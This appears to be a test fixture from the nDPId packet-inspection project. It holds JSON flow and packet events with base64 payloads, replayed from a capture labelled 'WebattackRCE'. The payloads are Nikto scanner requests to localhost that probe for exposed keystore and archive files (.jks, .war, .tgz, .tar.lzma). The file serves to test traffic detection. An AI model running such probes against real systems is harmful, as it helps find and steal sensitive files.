+01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":307,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":307,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277166,"flow_last_seen":1576420277166,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277166,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50158,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.1.jks","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":308,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":308,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277168,"flow_last_seen":1576420277168,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277168,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50160,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":308,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":308,"flow_packet_id":1,"flow_last_seen":1576420277168,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420277168,"pkt":"AAAAAAAAAAAAAAAACABFAADFNC9AAEAGCAJ\/AAABfwAAAcPwH5DG1AyisQj3YYAYAED+uQAAAQEICp1m\/NidZvzYR0VUIC8xMjcuMC4wLjEuamtzIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} +01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":308,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":308,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277168,"flow_last_seen":1576420277168,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277168,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50160,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.1.jks","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":309,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":309,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277170,"flow_last_seen":1576420277170,"flow_idle_time":7560000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420277170,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50162,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":309,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":309,"flow_packet_id":1,"flow_last_seen":1576420277170,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":209,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":209,"pkt_l4_len":175,"thread_ts_msec":1576420277170,"pkt":"AAAAAAAAAAAAAAAACABFAADDKQdAAEAGEyx\/AAABfwAAAcPyH5DtUBGKsAbmZ4AYAED+twAAAQEICp1m\/NqdZvzZR0VUIC8xMjcuMC4wLndhciBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} +01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":309,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":309,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277170,"flow_last_seen":1576420277170,"flow_idle_time":7560000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420277170,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50162,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP 
Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.war","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":310,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":310,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277171,"flow_last_seen":1576420277171,"flow_idle_time":7560000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420277171,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50164,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":310,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":310,"flow_packet_id":1,"flow_last_seen":1576420277171,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":209,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":209,"pkt_l4_len":175,"thread_ts_msec":1576420277171,"pkt":"AAAAAAAAAAAAAAAACABFAADDFtRAAEAGJV9\/AAABfwAAAcP0H5DIKS5flUY6Y4AYAED+twAAAQEICp1m\/NudZvzbR0VUIC8xMjcuMC4wLndhciBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} 
+01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":310,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":310,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277171,"flow_last_seen":1576420277171,"flow_idle_time":7560000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420277171,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50164,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.war","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":311,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":311,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277172,"flow_last_seen":1576420277172,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277172,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50166,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":311,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":311,"flow_packet_id":1,"flow_last_seen":1576420277172,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420277172,"pkt":"AAAAAAAAAAAAAAAACABFAADBjc9AAEAGrmV\/AAABfwAAAcP2H5CR+bVBDfA+SoAYAED+tQAAAQEICp1m\/NydZvzcR0VUIC8xMjcuMC50Z3ogSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"} +01058{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":311,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":311,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277172,"flow_last_seen":1576420277172,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277172,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50166,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.tgz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":312,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":312,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277173,"flow_last_seen":1576420277173,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277173,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50168,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":312,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":312,"flow_packet_id":1,"flow_last_seen":1576420277173,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420277173,"pkt":"AAAAAAAAAAAAAAAACABFAADBJThAAEAGFv1\/AAABfwAAAcP4H5BkXx28+RQoaIAYAED+tQAAAQEICp1m\/N2dZvzdR0VUIC8xMjcuMC50Z3ogSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} +01058{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":312,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":312,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277173,"flow_last_seen":1576420277173,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277173,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50168,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP 
Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.tgz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":313,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":313,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277175,"flow_last_seen":1576420277175,"flow_idle_time":7560000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420277175,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50170,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":313,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":313,"flow_packet_id":1,"flow_last_seen":1576420277175,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":205,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":205,"pkt_l4_len":171,"thread_ts_msec":1576420277175,"pkt":"AAAAAAAAAAAAAAAACABFAAC\/vR9AAEAGfxd\/AAABfwAAAcP6H5AAgoWRJHk9poAYAED+swAAAQEICp1m\/N+dZvzfR0VUIC8xMjcuamtzIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} 
+01056{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":313,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":313,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277175,"flow_last_seen":1576420277175,"flow_idle_time":7560000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420277175,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50170,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.jks","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":314,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":314,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277176,"flow_last_seen":1576420277176,"flow_idle_time":7560000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420277176,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50172,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":314,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":314,"flow_packet_id":1,"flow_last_seen":1576420277176,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":205,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":205,"pkt_l4_len":171,"thread_ts_msec":1576420277176,"pkt":"AAAAAAAAAAAAAAAACABFAAC\/G85AAEAGIGl\/AAABfwAAAcP8H5A9SCNDeIAPvYAYAED+swAAAQEICp1m\/OCdZvzgR0VUIC8xMjcuamtzIEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} +01056{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":314,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":314,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277176,"flow_last_seen":1576420277176,"flow_idle_time":7560000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420277176,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50172,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.jks","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":315,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":315,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277177,"flow_last_seen":1576420277177,"flow_idle_time":7560000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277177,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50174,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":315,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":315,"flow_packet_id":1,"flow_last_seen":1576420277177,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420277177,"pkt":"AAAAAAAAAAAAAAAACABFAADAz0lAAEAGbOx\/AAABfwAAAcP+H5CCs\/fKIUNf1IAYAED+tAAAAQEICp1m\/OGdZvzhR0VUIC9zaXRlLmFseiBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} +01057{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":315,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":315,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277177,"flow_last_seen":1576420277177,"flow_idle_time":7560000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277177,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50174,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric 
IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/site.alz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":316,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":316,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277179,"flow_last_seen":1576420277179,"flow_idle_time":7560000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277179,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50176,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":316,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":316,"flow_packet_id":1,"flow_last_seen":1576420277179,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420277179,"pkt":"AAAAAAAAAAAAAAAACABFAADAZxxAAEAG1Rl\/AAABfwAAAcQAH5BgPl+VSob0sYAYAED+tAAAAQEICp1m\/OOdZvzjR0VUIC9zaXRlLmFseiBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KDQo="} 
+01057{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":316,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":316,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277179,"flow_last_seen":1576420277179,"flow_idle_time":7560000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277179,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50176,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/site.alz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":317,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":317,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277180,"flow_last_seen":1576420277180,"flow_idle_time":7560000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420277180,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50178,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":317,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":317,"flow_packet_id":1,"flow_last_seen":1576420277180,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":212,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":212,"pkt_l4_len":178,"thread_ts_msec":1576420277180,"pkt":"AAAAAAAAAAAAAAAACABFAADGTHlAAEAG77Z\/AAABfwAAAcQCH5A4KXT5upP6C4AYAED+ugAAAQEICp1m\/OSdZvzkR0VUIC8xMjcuMC50YXIubHptYSBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} +01063{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":317,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":317,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277180,"flow_last_seen":1576420277180,"flow_idle_time":7560000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420277180,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50178,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.tar.lzma","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":318,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":318,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277183,"flow_last_seen":1576420277183,"flow_idle_time":7560000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420277183,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50180,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":318,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":318,"flow_packet_id":1,"flow_last_seen":1576420277183,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":212,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":212,"pkt_l4_len":178,"thread_ts_msec":1576420277183,"pkt":"AAAAAAAAAAAAAAAACABFAADGDUpAAEAGLuZ\/AAABfwAAAcQEH5BEmzXIVOhE3IAYAED+ugAAAQEICp1m\/OadZvzmR0VUIC8xMjcuMC50YXIubHptYSBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} 